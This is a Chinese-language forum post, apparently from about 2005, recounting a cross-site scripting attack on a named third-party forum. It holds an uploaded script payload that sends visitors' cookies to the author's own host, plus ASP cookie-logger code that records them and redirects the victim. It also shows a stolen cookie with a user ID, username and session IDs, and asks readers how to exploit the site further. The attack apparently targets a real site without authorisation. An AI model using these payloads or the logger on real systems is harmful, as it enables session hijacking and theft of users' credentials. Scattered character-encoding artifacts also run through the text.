一、跨站測(cè)試
先看看我的一次跨站測(cè)試吧
我以職業(yè)欠錢的站點(diǎn)做測(cè)試吧:
Host:zhiyeqianqian.51web.cn
My Test:
先在他的論談上傳兩張圖，
圖一的內(nèi)容是:
<script>document.location='http://linzi.cnbct.org/cookie.asp?msg='+document.cookie</script>
得到url為UploadFile/2005-6/200562716565777847.jpg
圖二則是偶的個(gè)人照
UploadFile/2005-6/200562716563048909.jpg
寫個(gè)盜cookie的代碼到我的空間,lcx的盜cookie代碼有問(wèn)題，所以修改了一下。
<%
cookiefile=Server.MapPath("cookie.txt")
set fs=server.CreateObject("scripting.filesystemobject")
set cookiefile=fs.OpenTextfile(cookiefile,8,True,0)
cookiefile.Write(Request.QueryString&"<br>")
cookiefile.close
set fs = nothing
%>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL= http://zhiyeqianqian.51web.cn/UploadFile/2005-6/200562716563048909.jpg">
接下來(lái)，點(diǎn)擊圖一，自動(dòng)轉(zhuǎn)到圖二，

二、結(jié)果分析
再到我的空間看一下，抓到cookie如下:
msg=ewwwrootzhiyeqianqianwwwroot=UserID=218&usercookies=1&StatUserID=2190418138&password=想要嗎？嘿嘿&userhidden=2&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=linzi;%20ASPSESSIONIDQSCAAQTB=HMPLNIMDHOCDJKPELPGBBOOG;%20Dvbbs;%20DvbbsMagicFace=862;%20upNum=2;%20ASPSESSIONIDQSAAARTB=JBPPMONDDEGFGHEOICDHFJIM<br>
分析cookie我們不難看出他的絕對(duì)路徑是e:\wwwroot\zhiyeqianqian\wwwroot


三、論談
本來(lái)，最初的測(cè)試我是在測(cè)試BCT論談，成功暴出他的絕對(duì)路徑，一開始的時(shí)候，我還認(rèn)為可能又是動(dòng)網(wǎng)出洞洞了，所以又去測(cè)試了其它幾個(gè)站，測(cè)試結(jié)果是其它的站點(diǎn)并沒(méi)有暴出路徑，今天再次測(cè)試“欠我錢”的論談，卻又暴不出來(lái)，查了一下代碼，和別人的代碼一個(gè)樣，根本沒(méi)什么差別。
偶想聽(tīng)聽(tīng)大家的看法，到底是哪里出了問(wèn)題，能不能深入利用~~~

最新評(píng)論